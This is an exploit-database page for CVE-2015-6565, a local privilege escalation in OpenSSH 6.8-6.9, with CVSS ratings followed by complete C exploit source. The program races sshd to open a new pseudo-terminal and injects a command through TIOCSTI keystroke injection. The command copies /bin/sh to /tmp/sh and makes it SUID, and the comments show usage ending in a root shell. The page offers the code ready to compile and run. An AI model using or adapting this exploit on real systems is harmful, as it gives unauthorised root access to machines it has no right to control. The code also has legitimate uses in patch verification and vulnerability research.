OpenSSH 6.8-6.9 local privilege escalation

2017.01.27
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* * not_an_sshnuke.c * * Federico Bento * * up201407890 () alunos dcc fc up pt * https://twitter.com/uid1000 * * OpenSSH 6.8-6.9 local privilege escalation - CVE-2015-6565 * * Considered mostly to be a "DoS", turns out to be a priv esc vuln. * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565 * * Shoutz to Jann Horn for the detailed analysis * And also to all my elite colleagues, specially xSTF :) * * * $ gcc not_an_sshnuke.c -o not_an_sshnuke * $ ./not_an_sshnuke /dev/pts/3 * [*] Waiting for slave device /dev/pts/3 * [+] Got PTY slave /dev/pts/3 * [+] Making PTY slave the controlling terminal * [+] SUID shell at /tmp/sh * $ /tmp/sh --norc --noprofile -p * # id * euid=0(root) groups=0(root) * */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <sys/ioctl.h> int main(int argc, char *argv[]) { char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n"; int pid, pts = -1; if(argc != 2) { fprintf(stderr, "Usage: %s /dev/pts/X\n", argv[0]); fprintf(stderr, "Where X is next slave device to be created\n"); return 1; } if(!access(argv[1], F_OK)) { fprintf(stderr, "[-] %s device already exists\n", argv[1]); return 1; } pid = fork(); if(pid < 0) { fprintf(stderr, "[-] fork failed\n"); return 1; } if(pid == 0) { printf("[*] Waiting for slave device %s\n", argv[1]); /* win the race by opening the PTY slave before sshd's child */ while(pts == -1) pts = open(argv[1], O_WRONLY); printf("[+] Got PTY slave %s\n", argv[1]); printf("[+] Making PTY slave the controlling terminal\n"); dup2(pts, 0); dup2(pts, 1); dup2(pts, 2); setsid(); ioctl(0, TIOCSCTTY, 1); while(*cmd) ioctl(0, TIOCSTI, cmd++); } else { wait(NULL); printf("[+] SUID shell at /tmp/sh\n"); return 0; } }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top